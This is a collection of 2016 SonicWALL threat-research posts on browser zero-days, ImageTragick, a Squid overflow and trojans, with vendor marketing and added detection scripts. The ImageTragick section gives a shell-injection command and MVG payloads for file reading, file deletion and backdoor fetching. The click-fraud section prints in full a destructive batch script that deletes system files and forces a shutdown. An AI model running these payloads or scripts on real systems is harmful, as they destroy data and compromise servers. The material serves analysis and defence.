Microsoft (CVE-2016-0189) and Adobe (CVE-2016-4117) Zero Days (May 12, 2016)

Recently discovered zero-day vulnerabilities in the Microsoft scripting engines and in Adobe Flash Player are being exploited in the wild.

The Microsoft JScript and VBScript engines, as used in Internet Explorer 9 through 11 and other products, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Scripting Engine Memory Corruption Vulnerability" (CVE-2016-0189).

Adobe Flash Player 21.0.0.226 and earlier allows remote attackers to execute arbitrary code via unspecified vectors (CVE-2016-4117).

The Dell SonicWALL Threat Research Team has released the following signatures to protect customers:

  • SPY 4502: Malformed-File swf.MP.410
  • IPS 11594: Scripting Engine Memory Corruption Vulnerability (MS16-051) 1

Redosdru.V Malware that hides in encrypted DLL files to avoid detection by Firewalls (May 11, 2016)

The Dell SonicWALL Threats Research team observed reports of a new malware family, GAV: Redosdru.V, actively spreading in the wild. This time the attackers use a dropper to download the actual malware, which is hidden inside encrypted DLL files so that firewall inspection does not recognise it.

Infection Cycle:

MD5:

  • 807db66fd414f3eb5e74e10fc4309ae3

The malware adds the following files to the system:

  • Malware.exe

    • C:\Program Files\AppPatch\Netsyst96.dll

    • C:\Program Files\Microsoft Fduood\Fduzjyw.exe

The Trojan adds the following keys to the Windows registry to ensure persistence upon reboot:

  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

    • Wsejti gzuaqwud = C:\Program Files\Microsoft Fduood\Fduzjyw.exe

Once the computer is compromised, the malware copies its files to the AppPatch folder.

The malware then tries to download the encrypted DLL file from its C&C server at the following domain:

Here is an example of encrypted DLL file:

Command and Control (C&C) Traffic

Redosdru.V communicates over ports 9925 and 60321. The malware sends information about the infected system to its C&C server in the following format; here is an example:

We have been monitoring varying hits over the past few days for the signature that blocks this threat:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Redosdru.V (Trojan)

Microsoft Security Bulletin Coverage (May 10, 2016)

Dell SonicWALL has analyzed and addressed Microsoft's security advisories for May 10, 2016. A list of the issues reported, along with Dell SonicWALL coverage information, follows:

MS16-051 Cumulative Security Update for Internet Explorer

  • CVE-2016-0188 Internet Explorer Security Feature Bypass
    There are no known exploits in the wild.
  • CVE-2016-0189 Scripting Engine Memory Corruption Vulnerability
    IPS:11594 "Scripting Engine Memory Corruption Vulnerability (MS16-051) 1"
  • CVE-2016-0192 Microsoft Browser Memory Corruption Vulnerability
    IPS:11595 "Microsoft Browser Memory Corruption Vulnerability (MS16-051) 1"
  • CVE-2016-0194 Internet Explorer Information Disclosure Vulnerability
    SPY:4495 "Malformed-File exe.MP.15"

MS16-052 Cumulative Security Update for Microsoft Edge

  • CVE-2016-0191 Microsoft Edge Memory Corruption Vulnerability
    IPS:11596 "Microsoft Edge Memory Corruption Vulnerability (MS16-051) 1"
  • CVE-2016-0192 Microsoft Browser Memory Corruption Vulnerability
    IPS:11595 "Microsoft Browser Memory Corruption Vulnerability (MS16-051) 1"
  • CVE-2016-0193 Scripting Engine Memory Corruption Vulnerability
    IPS:11597 "Scripting Engine Memory Corruption Vulnerability (MS16-051) 2"

MS16-053 Cumulative Security Update for JScript and VBScript

  • CVE-2016-0187 Scripting Engine Memory Corruption Vulnerability
    IPS:11598 "Scripting Engine Memory Corruption Vulnerability (MS16-051) 3"
  • CVE-2016-0189 Scripting Engine Memory Corruption Vulnerability
    IPS:11594 "Scripting Engine Memory Corruption Vulnerability (MS16-051) 1"

MS16-054 Security Update for Microsoft Office

  • CVE-2016-0126 Microsoft Office Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-0140 Microsoft Office Memory Corruption Vulnerability
    SPY:4335 "Malformed-File xls.MP.52"
  • CVE-2016-0183 Microsoft Office Graphics RCE Vulnerability
    There are no known exploits in the wild.

MS16-055 Security Update for Microsoft Graphics Component

  • CVE-2016-0168 Windows Graphics Component Information Disclosure Vulnerability
    SPY:4500 "Malformed-File emf.MP.2"
  • CVE-2016-0169 Windows Graphics Component Information Disclosure Vulnerability
    SPY:4499 "Malformed-File emf.MP.1"
  • CVE-2016-0170 Windows Graphics Component RCE Vulnerability
    SPY:4499 "Malformed-File emf.MP.1"
  • CVE-2016-0184 Direct3D Use After Free Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-0195 Direct3D Use After Free RCE Vulnerability
    This is a local vulnerability.

MS16-056 Security Update for Windows Journal

  • CVE-2016-0182 Windows Journal Memory Corruption Vulnerability
    This is a local vulnerability.

MS16-057 Security Update for Windows Shell

  • CVE-2016-0179 Windows Shell Remote Code Execution Vulnerability
    There are no known exploits in the wild.

MS16-058 Security Update for Windows IIS

  • CVE-2016-0152 Windows DLL Loading Remote Code Execution Vulnerability
    There are no known exploits in the wild.

MS16-059 Security Update for Windows Media Center

  • CVE-2016-0185 Windows Media Center Remote Code Execution Vulnerability
    IPS:11593 “Windows Media Center Remote Code Execution (MS16-059)”

MS16-060 Security Update for Windows Kernel

  • CVE-2016-0180 Windows Kernel Elevation of Privilege Vulnerability
    This is a local vulnerability.

MS16-061 Security Update for Microsoft RPC

  • CVE-2016-0178 RPC Network Data Representation Engine Elevation of Privilege Vulnerability
    SPY:4497 "Malformed-File exe.MP.14"

MS16-062 Security Update for Windows Kernel-Mode Drivers

  • CVE-2016-0171 Win32k Elevation of Privilege Vulnerability
    This is a local vulnerability.
  • CVE-2016-0172 Win32k Elevation of Privilege Vulnerability
    This is a local vulnerability.
  • CVE-2016-0173 Win32k Elevation of Privilege Vulnerability
    This is a local vulnerability.
  • CVE-2016-0174 Win32k Elevation of Privilege Vulnerability
    This is a local vulnerability.
  • CVE-2016-0175 Win32k Information Disclosure Vulnerability
    This is a local vulnerability.
  • CVE-2016-0176 Win32k Elevation of Privilege Vulnerability
    This is a local vulnerability.
  • CVE-2016-0196 Win32k Elevation of Privilege Vulnerability
    This is a local vulnerability.
  • CVE-2016-0197 Microsoft DirectX Graphics Kernel Subsystem Elevation of Privilege Vulnerability
    There are no known exploits in the wild.

MS16-064 Security Update for Adobe Flash Player

  • CVE-2016-0177 Schannel Information Disclosure Vulnerability
    There are no known exploits in the wild.

MS16-065 Security Update for .NET Framework

  • CVE-2016-0149 TLS/SSL Information Disclosure Vulnerability
    There are no known exploits in the wild.

MS16-066 Security Update for Virtual Secure Mode

  • CVE-2016-0181 Hypervisor Code Integrity Security Feature Bypass
    There are no known exploits in the wild.

MS16-067 Security Update for Volume Manager Driver

  • CVE-2016-0190 Remote Desktop Protocol Drive Redirection Information Disclosure Vulnerability
    There are no known exploits in the wild.

ImageTragick: Owning a Web Server Via Simple Upload (May 9, 2016)

When it comes to editing, converting or modifying pictures, the first thing that comes to mind is Photoshop or MS Paint. But imagine a website that has to resize, crop, blur, rotate or watermark every picture uploaded by thousands of users; doing that by hand is out of the question. One of the most popular tools such web services use for automated image processing is ImageMagick.

Recently there have been reports of multiple vulnerabilities in ImageMagick, collectively nicknamed ImageTragick. Let's explore some of them in detail.

Basic Setup

In order to understand what is going on, we need the following:

1. Web server -> For this, I set up an Ubuntu server running Apache.

2. ImageMagick -> The vulnerable toolkit we are testing. We will mainly focus on the "convert" tool. As the name implies, it converts an image file from one format to another; it can also resize, crop, and so on.

For example:

      convert test.jpg test.png
      convert test.jpg -resize 200x200 out.png

The first command converts a JPEG file into a PNG file; the second converts a JPEG file into a PNG file and resizes it to 200x200.

3. PHP/Perl/Python -> Since we will be dealing with files uploaded to the web server, we need server-side scripts to process them. For this, I have two files, an HTML page and a PHP script.

HTML:

PHP:

So We Upload Images?

Although ImageMagick processes images, it also accepts text files. SVG and MVG files contain drawing instructions that tell ImageMagick what to render, and ImageMagick picks the coder to use from the file's content, not from its extension.

The file above tells ImageMagick to draw an ellipse with a black edge and a red interior. To get the JPEG equivalent, we simply run: convert elipse.mvg elipse.jpg

And Voila!

The vulnerabilities lie in how ImageMagick handles certain "pseudo protocols" (coders such as label:, ephemeral: and url:) referenced from those drawing instructions. Let's explore some of them now.

CVE-2016-3714 – Code execution via insufficient character filtering

ImageMagick does not adequately filter shell metacharacters in the filename string it hands to the external delegate commands it shells out to, so an attacker can smuggle commands into that string. Simply calling the "convert" tool with a crafted filename executes them, as this command-line example shows:

      convert 'https://example.com";ls "-la' new.png

The same injection works from an MVG or SVG file, such as the following:

Then in the command line, run:

      convert insufficient.mvg test.png

However, based on my file upload tests, I have yet to make this work. It may just be a local vulnerability. But do not fret: there is more than one way to own a server.

CVE-2016-3717 – Local file read

This vulnerability lets a remote attacker read files on the web server. It stems from how ImageMagick handles the 'label' pseudo protocol: by referencing the name of the file they want to view (label:@/path), the attacker gets back an image whose rendered text is the file's contents.

Uploading this file through our test HTML page, we get:

CVE-2016-3715 – File deletion

Once the attacker has read the file contents, they need to remove the traces. One way is to delete the image file created by the previous exploit, using the 'ephemeral' pseudo protocol, which deletes a file after reading it.

Using the ellipse example earlier, we can delete the generated image file containing /etc/passwd:

CVE-2016-3718 – SSRF

Perhaps the most tragic of all the ImageMagick vulnerabilities is the SSRF (Server Side Request Forgery). It lets an attacker make the web server download remote files.

If it only allows file downloads, why is it tragic? The reason is simple: the downloaded file can be a backdoor script. In 2015 it was reported that pastebin.com, a legitimate site, was being used to host malicious scripts. Using the "url" pseudo protocol, the server can be made to issue an HTTP GET request that fetches a PHP backdoor directly from pastebin.com.

After uploading the malicious MVG, we can browse to the downloaded "backdoor.php":

As you can see, the PHP script above is capable of far more than information disclosure or file deletion.

Prevention Methods:

As shown above, filename extension checks do nothing to prevent these attacks: every file we uploaded carried a .jpg extension, and ImageMagick still selected the MVG coder from the file's content.

Some suggest using an ImageMagick policy file (policy.xml) to disable the vulnerable coders/protocols, and that is the fix to apply: it removes the dangerous coders no matter how a file reaches ImageMagick. If you are sure that you do not need MVG and SVG uploads, you can additionally reject them at the upload handler with the PHP getimagesize() function: MVG and SVG files are essentially text, so it returns false for them. Bear in mind that getimagesize() only inspects the file header, so treat it as a front-door check rather than a substitute for the policy file.
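To make the two layers concrete, here is an added example that is not code from the original post (and is Python rather than the post's PHP): a pre-check a practitioner could put in front of `convert`. Layer one is the getimagesize() idea, a raster signature check; layer two scans the body for the pseudo-protocol shapes described above, so a polyglot with a valid header followed by MVG commands is also refused. The sample MVG files and the JPEG stub are constructed for the demo, and the mapping of patterns to CVEs is this example's own approximation of the behaviours described in the post, not SonicWALL's signatures.

```python
"""Two-layer upload pre-check for an ImageMagick pipeline (added example)."""
import re

# Signatures of the raster formats we are prepared to pass to `convert`.
RASTER_MAGIC = (
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
)

# Either marker makes ImageMagick select the MVG or SVG text coder.
TEXT_CODER_RE = re.compile(rb"push\s+graphic-context|<svg\b", re.I)

# Content patterns for the ImageTragick issues discussed in the post
# (example's own approximation, not vendor signatures).
SIGNATURES = (
    # URL followed directly by a quote and a shell separator, or by a
    # backtick: the delegate command-injection shape of CVE-2016-3714.
    ("CVE-2016-3714", re.compile(rb"https?://[^\s\"'`]*(?:[\"']\s*[|;]|`)", re.I)),
    # label:@/path renders a local file's contents (CVE-2016-3717).
    ("CVE-2016-3717", re.compile(rb"\blabel\s*:\s*@", re.I)),
    # ephemeral: deletes the referenced file after reading it (CVE-2016-3715).
    ("CVE-2016-3715", re.compile(rb"\bephemeral\s*:", re.I)),
    # Any remote fetch through url(...) or the url: coder (CVE-2016-3718).
    ("CVE-2016-3718", re.compile(
        rb"\burl\s*(?:\(\s*['\"]?\s*(?:url\s*:|https?://)|:\s*https?://)", re.I)),
)


def sniff_raster(data: bytes):
    """Return the raster format named by the leading bytes, or None."""
    for magic, fmt in RASTER_MAGIC:
        if data.startswith(magic):
            return fmt
    return None


def scan_for_imagetragick(data: bytes):
    """Return the sorted CVE labels whose pattern occurs in data."""
    return sorted(cve for cve, pattern in SIGNATURES if pattern.search(data))


def check_upload(data: bytes):
    """Decide whether an upload may be handed to `convert`.

    Returns (accepted, detail); detail is the format when accepted,
    otherwise the reason for refusal.
    """
    fmt = sniff_raster(data)
    text_coder = TEXT_CODER_RE.search(data) is not None
    if fmt is None:
        if text_coder:
            return False, "MVG/SVG text file, refused regardless of extension"
        return False, "not a recognised raster image"
    if text_coder:
        hits = scan_for_imagetragick(data)
        if hits:
            return False, "polyglot carrying " + ", ".join(hits)
        return False, "polyglot: raster header followed by MVG/SVG commands"
    return True, fmt


# --- constructed samples (not files from the post) -----------------------
# A benign MVG like the post's red ellipse with a black edge.
ELLIPSE_MVG = (b"push graphic-context\nviewbox 0 0 300 200\n"
               b"fill red\nstroke black\nellipse 150,100 100,60 0,360\n"
               b"pop graphic-context\n")
# Local file read followed by the cover-up deletion (3717 + 3715).
READ_AND_DELETE_MVG = (b"push graphic-context\n"
                       b"image over 0,0 0,0 'label:@/etc/passwd'\n"
                       b"image over 0,0 0,0 'ephemeral:/var/www/uploads/passwd.jpg'\n"
                       b"pop graphic-context\n")
# Shell-injection shape of the convert command shown in the post.
INJECTION_MVG = (b"push graphic-context\n"
                 b"fill 'url(https://example.com/image.jpg\"|ls \"-la)'\n"
                 b"pop graphic-context\n")
# Remote fetch only: the SSRF case.
SSRF_MVG = (b"push graphic-context\n"
            b"fill 'url(http://example.com/backdoor.txt)'\npop graphic-context\n")
# Minimal JPEG header standing in for a real photo upload.
JPEG_STUB = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32

if __name__ == "__main__":
    samples = [("ellipse.mvg", ELLIPSE_MVG), ("readdel.jpg", READ_AND_DELETE_MVG),
               ("inject.jpg", INJECTION_MVG), ("ssrf.jpg", SSRF_MVG),
               ("photo.jpg", JPEG_STUB), ("poly.jpg", JPEG_STUB + INJECTION_MVG)]
    for name, blob in samples:
        print(name, check_upload(blob))
```

Note that the benign ellipse MVG is refused too: that is the post's own recommendation when MVG/SVG uploads are not needed, and the CVE labels are only there to tell the responder which signature to expect in the IPS/WAF logs.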

The Dell SonicWALL Threat Research Team has researched these vulnerabilities and released the following signatures to protect customers:

  • IPS11587: ImageMagick Local File Read
  • IPS11584: ImageMagick Remote Code Execution 1
  • IPS11585: ImageMagick Remote Code Execution 2
  • IPS11589: ImageMagick SSRF
  • WAF9023: ImageMagick Local File Read
  • WAF9022: ImageMagick File Deletion
  • WAF9021: ImageMagick Server Side Remote Forgery

Squid Proxy ESI Component Buffer Overflow (May 6, 2016)

Squid is a caching web proxy supporting HTTP, HTTPS, FTP and more. It reduces bandwidth and improves response times by caching and reusing frequently requested web pages.

A buffer overflow in Squid allows remote attackers to execute arbitrary code via crafted Edge Side Includes (ESI) responses (CVE-2016-4054).

ESI is a small markup language for edge-level dynamic web content assembly. A stack-based buffer overflow exists in the Squid server, caused by an implementation error when it processes ESI markup tags. Because the trigger is a response, the attacker needs to control, or be able to impersonate, an origin server whose responses Squid processes as ESI.

The vulnerable function is ESIContext::start(). The patch fixes the overflow by checking the size of the destination buffer before copying into it.

The Dell SonicWALL Threat Research Team has researched this vulnerability and released the following signature to protect customers:

  • IPS 4902:Server Application Shellcode Exploit 20

Top Reasons to Update to SonicWall SonicOS 6.2.5 for Better Network Protection

Like many people, I sometimes pass over or delay software updates, but this one was different. The new SonicOS 6.2.5 adds so many critical new features and so much functionality that I updated my SonicWall TZ firewall the moment it was available.

The new SonicOS 6.2.5 also gave me a chance to make more sense out of my network. My wife works from home, so our network carries both business and personal traffic. SonicOS 6.2.5 adds support for SonicWall X-Series switches on the SonicWall TZ300, TZ400, TZ500 and TZ600 next-generation firewalls. So by replacing my old switch with a SonicWall X-Series switch, I now have a secure network that will allow me to expand as I add more technology. Plus, I am confident that both our home and business data is now protected with the same security engine that is used by governments, colleges, hospitals and banks.

Here are a few reasons this update makes sense for any small business:

  1. The TZ firewall does not slow my network down.
  2. I manage everything from the TZ firewall, including the switch and my SonicWall SonicPoint access points
  3. Protection, protection, protection. At the National Retail Federation show in January, I (accurately) predicted 2016 to be the year where businesses will be hit with ransomware attacks. One of the strengths of SonicWall is how fast it protects me from all new malware (in this case, ransomware). I continue to make backups, but I feel confident that I will not get breached by this particularly insidious type of malware.

And here what is so exciting about this new release for the distributed enterprise:

  1. With GMS, you can centrally manage the entire network infrastructure of a single site (and all distributed remote sites) including firewalls, switches, wireless access points and WAN acceleration devices. Being able to see what is happening on your network and pushing consistent policies to all sites is a compelling reason to upgrade.
  2. Multiple enhancements for more efficient inspection of encrypted traffic (TLS/SSL) with easier troubleshooting, better scalability and enhanced ease of use. Encrypted traffic is on the rise (50% surge according to 2016 SonicWall Security Annual Threat Report). It’s time to up your game and avoid a costly compromise or denial of service.
  3. With SonicOS 6.2.5,  SonicWall firewalls have achieved the prestigious Department of Defense (DoD) certification based on stringent security requirements. If a product with a firmware version is qualified for use by DoD, then it’s a safe (pun-intended) reason to upgrade your products to 6.2.5 now.

There are also additional improvements that anticipate the dynamic malware business. In our recently published Threat Report, we noted a substantial rise in encrypted communication. This is great for your privacy, but it also gives criminals a very easy method to penetrate networks. Most firewalls either do not inspect encrypted sessions or have this feature turned off, a big mistake! An easy way to bypass your network's security is by sending encrypted malware. Encrypted malware is a reality, so be better prepared with this new OS release. With this new release, the improved user interface makes it easier to set up and manage, especially when it comes to excluding inspection on traffic (such as Google searches).

Building a secure network is something that everyone should insist on. With the new SonicOS features I am a little bit closer. With the addition of X-Series switch support to the TZ line (only the TZ300, TZ400, TZ500 and TZ600 products at this time), my network is easier to manage, less complex and more secure.

My friend, Sathya Thammanur, product manager for SonicWall TZs, talked in more detail about the new features of SonicOS 6.2.5 in his recent launch blog. If you are looking for more information his comments are a great place to start or you can download our whitepaper: The Distributed Enterprise and the SonicWall TZ – Building a Coordinated Security Perimeter. If you are ready to upgrade your network, give us a call to explain how security does not have to cost you a lot of money or give you a big headache. As the security officer of your small business, your home or your distributed enterprise, SonicWall has a solution to make your life easier.

We Need to Re-think our Approach to IT Security

Despite the dramatic increase in IT security spending over the last decade, we continue to see a similar increase in the number and the cost of IT security breaches. Consider that Gartner estimates IT security spending will soar from more than $75 billion in 2015 to $101 billion in 2018, and research firm Markets and Markets sees the cybersecurity market hitting $170 billion by 2020.

We have all read about the high-profile breaches at Sony, Target and the U.S. Office of Personnel Management, yet few of us realize that an order of magnitude more breaches hit lesser-known and smaller companies every day. Forty-two percent of SMBs said they experienced a cyberattack within the past year, according to a Ponemon Institute study, and a study by the same firm puts the average cost of a breach at $3.8 million, a 23 percent increase since 2013.

What this means is that despite all the money and effort we have put into improving IT Security, something is not working. Or at least not as well as we all would like.

The obvious reaction to these trends is to remain cautious, to be on alert, to hold back on granting access to internal applications and data that might add the risk of another breach. Curtis Hutcheson, VP and GM of SonicWall Security Solutions discussed the need for a new approach to IT security in his recent blog.

Who, of course, would not react this way? Who could honestly say they aren’t afraid of an attack that would result in lost customers, lost revenue and lost jobs?

But holding back out of fear is not the right answer. Markets are competitive. There is always another company, organization, agency that is ready to take our customers, students, and stakeholders should we slip or fall behind.

Enabling employees, students, and administrators with access to the latest tools and applications is critical to remaining competitive, to innovating, to winning. Saying “No” might make us feel safer in the short run, but it is likely to cause larger systemic issues that make us irrelevant in today’s fast paced world.

At SonicWall Security we believe there is a way to say “Yes.” We believe IT security executives can:

  • Say “Yes” to initiatives that enable innovation and create competitive advantage

AND

  • Say “Yes” and dramatically improve security to keep corporate and organization assets safe from external threats.

We believe it’s time for IT Security leaders to re-think their approach to IT Security, to be bold and open up their own Department of Yes.

And we can help. Our context-aware security solutions share information, which allows IT security departments to Govern Every Identity and Inspect Every Packet on the network. These solutions, working together rather than in silos, deliver better overall security with less complexity and at lower total cost. Patrick Sweeny recently discussed how we can help you open your own Department of Yes.

We are committed to helping our customers deliver better overall security and driving innovation and competitive advantage. That is why we have launched a global campaign to help educate customers on how we can help them open their own Department of Yes. We are partnering with a number of large major media partners including RedmondMag, IDG, CSO, NetworkWorld, CNN and CNBC to help drive our message and educate IT Security executives.

Here are examples of the new campaign

Sound interesting? Learn more by visiting us at SonicWall.com.

Edge vs Internet Explorer 11 (May 1, 2016)

About a year ago Microsoft announced its plan to retire Internet Explorer. The new browser, Microsoft Edge, is now the default browser in Windows 10. We previously published a SonicAlert reporting this change.

Edge has many security improvements. It does not support legacy technologies such as ActiveX and Browser Helper Objects. Its layout engine, EdgeHTML, is a fork of Trident (the layout engine of Internet Explorer) with the legacy code of older Internet Explorer versions removed. EdgeHTML is meant to be interoperable with WebKit (the engine behind Safari, from which Google Chrome's Blink engine was forked).

Does Edge outperform Internet Explorer from a security perspective? We tried to find some clues.

Since August 2015, Microsoft has released “Cumulative Security Update for Microsoft Edge” each month. Below is the number of total CVEs related to IE 11 and Edge in last 9 months:

Below is the number of critical CVEs related to IE 11 and Edge in last 9 months:

Over the past years Microsoft has lost market share in web browsers (source: StatCounter), and we think one of the reasons is that Internet Explorer is more prone to vulnerabilities.

Microsoft is heading in the right direction on improving security in Edge. We hope Microsoft keeps up this effort so that one day Edge becomes a solid, integrated product.

Click-fraud Trojan deletes files and impairs systems (April 29th, 2016)

The Dell SonicWALL Threats Research team has discovered a click-fraud Trojan that also deletes files and attempts to disable parts of the operating system. It appears to be poorly written and did not succeed in disabling the mouse and keyboard on our test system. It is, however, able to delete files, kill explorer.exe and shut down the system.

Infection Cycle:

The Trojan drops the following file and runs it:

  • %USERPROFILE%\Local Settings\Temp\2.tmp\Virusok.bat

Virusok.bat is a Windows batch script containing the following instructions:

      @shift /0
      @echo off
      taskkill /im /f chrome.exe
      taskkill /im /f ie.exe
      taskkill /im /f firefox.exe
      taskkill /im /f opera.exe
      taskkill /im /f safari.exe
      del C:\Program Files\Google\Chrome\Appulcation\chrome.exe /q
      del C:\Program Files\Safari\safari.exe /q
      del C:\Program Files\Mozilla Firefox\firefox.exe /q
      del C:\Program Files\Opera\opera.exe /q
      del C:\Program Files\Internet Explorer\ie.exe /q
      start www.400kg.com
      rundll32 mouse,disable > nul
      rundll32 keyboard,disable > nul
      rundll32 user,disableoemlayer > nul
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Poulcies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f > nul
      taskkill /f /im explorer.exe > nul
      del: *.*/q > nul
      del %WinDir%\system32\HAL.dll/q > nul
      del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul
      del "%SystemRoot%\Cursors\*.*" >nul
      shutdown -s -t 00 -c error > nul
      del %0

In addition to deleting driver.cab and hal.dll, it deletes every file in the directory it is run from, as instructed by this line of the script:

      del: *.*/q > nul

The three rundll32 lines (mouse,disable, keyboard,disable and user,disableoemlayer) call entry points of 16-bit Windows driver modules that do not exist on NT-based Windows, which is why the attempt to disable the mouse and keyboard has no effect on a modern system.
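As an added example (not code from the original post), here is a small static triage pass a responder could run over a dropped batch file like the one above. It tags each line with the behaviour it implements (process kills, deletion of browser or system files, the input-disabling calls, the RestrictRun policy, the click-fraud URL, shutdown and self-deletion) and collapses the findings into a verdict. The embedded script is the Virusok.bat listing from the post; the category names, patterns and the verdict thresholds are this example's own.

```python
"""Static triage of a dropped batch script (added example)."""
import re
from collections import defaultdict

# One rule per behaviour; a line may match more than one rule.
RULES = (
    ("kill_browser",    re.compile(r"^taskkill\b.*\b(chrome|ie|firefox|opera|safari)\.exe", re.I)),
    ("kill_shell",      re.compile(r"^taskkill\b.*\bexplorer\.exe", re.I)),
    ("delete_browser",  re.compile(r"^del\b.*\\(chrome|ie|firefox|opera|safari)\.exe", re.I)),
    ("delete_system",   re.compile(r"^del\b.*(%SystemRoot%|%WinDir%|hal\.dll|driver\.cab)", re.I)),
    ("delete_wildcard", re.compile(r"^del:?\s*\*\.\*", re.I)),
    ("disable_input",   re.compile(r"^rundll32\s+(mouse|keyboard|user),", re.I)),
    ("restrict_run",    re.compile(r"^reg\s+add\b.*\\RestrictRun\b", re.I)),
    ("open_url",        re.compile(r"^start\s+(https?://|www\.)", re.I)),
    ("shutdown",        re.compile(r"^shutdown\b", re.I)),
    ("self_delete",     re.compile(r"^del\s+%0\b", re.I)),
)


def triage(script: str) -> dict:
    """Map each matched behaviour to the script lines that triggered it."""
    findings = defaultdict(list)
    for raw in script.splitlines():
        line = raw.strip().lstrip("@")   # a leading '@' only suppresses echo in cmd
        for name, pattern in RULES:
            if pattern.search(line):
                findings[name].append(line)
    return dict(findings)


def verdict(findings: dict) -> str:
    """Collapse the findings into a one-word verdict."""
    if {"delete_system", "delete_wildcard"} & findings.keys() or "shutdown" in findings:
        return "destructive"
    return "suspicious" if findings else "clean"


# The Virusok.bat listing reproduced in the post, used here as sample input.
VIRUSOK_BAT = r"""@shift /0
@echo off
taskkill /im /f chrome.exe
taskkill /im /f ie.exe
taskkill /im /f firefox.exe
taskkill /im /f opera.exe
taskkill /im /f safari.exe
del C:\Program Files\Google\Chrome\Appulcation\chrome.exe /q
del C:\Program Files\Safari\safari.exe /q
del C:\Program Files\Mozilla Firefox\firefox.exe /q
del C:\Program Files\Opera\opera.exe /q
del C:\Program Files\Internet Explorer\ie.exe /q
start www.400kg.com
rundll32 mouse,disable > nul
rundll32 keyboard,disable > nul
rundll32 user,disableoemlayer > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Poulcies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f > nul
taskkill /f /im explorer.exe > nul
del: *.*/q > nul
del %WinDir%\system32\HAL.dll/q > nul
del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul
del "%SystemRoot%\Cursors\*.*" >nul
shutdown -s -t 00 -c error > nul
del %0
"""

if __name__ == "__main__":
    found = triage(VIRUSOK_BAT)
    for name, lines in found.items():
        print(f"{name:16s} {len(lines)} line(s), e.g. {lines[0]}")
    print("verdict:", verdict(found))
```

The rules deliberately key on what the lines try to do rather than on exact strings, so the misspelt paths in this sample (which are part of why the script is only partly effective) still get tagged.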

The Trojan causes the following console window to be displayed on the screen:

As instructed in the batch script, it opens Internet Explorer to display www.400kg.com as part of its click-fraud operation:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

      GAV: Reconyc.A_4 (Trojan)

The SonicWall Security Threat Report 2016: Highlighting Trends in Exploit Kits

In February, we released our SonicWall Security 2016 Threat Report, and one of its highlights was a discussion on latest techniques and trends in exploit kits (EKs).

EKs have become a key tool for cybercriminals to take over target machines (via an exploit) and subsequently install malware of their choice.

For those with some background in researching EKs, the stages will seem familiar. First there is a redirection stage, which leads the user to the EK's landing page (either directly or via an infected website). The redirection can result from a URL in a spam email or a Twitter/Facebook feed, from an advertising banner (malvertising), or simply from an IFRAME on an infected website.

Next is the landing stage. Here, the target visits the actual web server where the EK software resides (i.e., the landing page) and the exploit is delivered.

During exploitation, carefully crafted scripts determine which software components are installed on the victim's machine (in order to select an appropriate exploit first). Then the targeted exploit is delivered and malware is subsequently installed on the target machine.

Some of the stages described above can be seen in the Spartan EK, discovered by the SonicWall Threat Research team last year.

As you may note in Spartan’s exploit kit delivery technique, the initial Flash file was encrypted, and the actual exploit code resided only in memory and was never written to disk (thus avoiding potential detection by AV software).

EK delivery mechanisms are evolving, and security vendors have to keep up with the latest evasion techniques in order to detect and/or prevent the attacks. It is not uncommon for EKs to check for the presence of certain AV software or a virtualized environment during the exploit stage and abort execution, so as not to expose themselves to security professionals (see the example code below).

For example, last year we observed the Magnitude EK using steganography during the redirection stage to dynamically generate an IFRAME from an encrypted/encoded image file. Such techniques make it harder for the affected website owner to identify the infection.

In addition, landing page URLs undergo periodic modifications to avoid detection by security vendors. We have observed landing page URL patterns change within 48 hours for certain EKs. Also, landing page’s software component detection techniques have undergone changes as well. Unlike in the past, we have observed EKs that can determine browser/component versions running on target systems without utilizing the JavaScript PluginDetect library.

What conclusions can security product designers draw from these trends? For one, given the obfuscation now applied to both the exploit and the malware payload, it is more important than ever to identify EK landing page access quickly and correctly, and to stop the exploit delivery at that point, before the user's browser receives it. Tracking EKs and their latest attack techniques is therefore an important part of any threat research team's activity.

Download the SonicWall Security Annual Threat Report today.